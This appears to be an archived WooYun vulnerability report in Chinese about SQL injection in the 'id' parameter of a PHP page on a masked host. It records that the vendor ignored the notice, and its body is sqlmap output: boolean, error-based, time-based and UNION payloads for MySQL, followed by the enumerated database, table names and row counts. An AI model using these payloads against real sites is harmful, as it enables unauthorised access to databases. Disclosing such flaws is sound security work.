乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-07: 细节已通知厂商并且等待厂商处理中 2015-12-12: 厂商已经主动忽略漏洞,细节向公众公开
RT
注入点
http://**.**.**.**/zxyh_show.php?id=77
sqlmap identified the following injection points with a total of 110 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=77 AND 4594=4594 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=77 AND (SELECT 6145 FROM(SELECT COUNT(*),CONCAT(0x717a716271,(SELECT (ELT(6145=6145,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: id=77 AND (SELECT * FROM (SELECT(SLEEP(10)))IISk) Type: UNION query Title: MySQL UNION query (NULL) - 32 columns Payload: id=-5708 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a716271,0x737370427556544d7277,0x71786b6b71),NULL,NULL,NULL,NULL#---web application technology: Apacheback-end DBMS: MySQL 5.0available databases [2]:[*] gazx[*] information_schemasqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=77 AND 4594=4594 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=77 AND (SELECT 6145 FROM(SELECT COUNT(*),CONCAT(0x717a716271,(SELECT (ELT(6145=6145,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: id=77 AND (SELECT * FROM (SELECT(SLEEP(10)))IISk) Type: UNION query Title: MySQL UNION query (NULL) - 32 columns Payload: id=-5708 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a716271,0x737370427556544d7277,0x71786b6b71),NULL,NULL,NULL,NULL#---web application technology: Apacheback-end DBMS: MySQL 5.0Database: gazx[19 tables]+-----------+| book || case_co || case_lm || info_co || info_lm || job || job_yp || master || person || pro_co || pro_img || pro_lm || qq_co || seo_co || setup || tb_pro_co || tb_pro_lm || tol_co || tol_lm |+-----------+Database: gazx+---------+---------+| Table | Entries |+---------+---------+| info_co | 94 || pro_co | 21 || tol_co | 17 || seo_co | 7 || info_lm | 4 || tol_lm | 4 || pro_lm | 2 || book | 1 || master | 1 || qq_co | 1 || setup | 1 |+---------+---------+
如上
危害等级:无影响厂商忽略
忽略时间:2015-12-12 15:08
暂无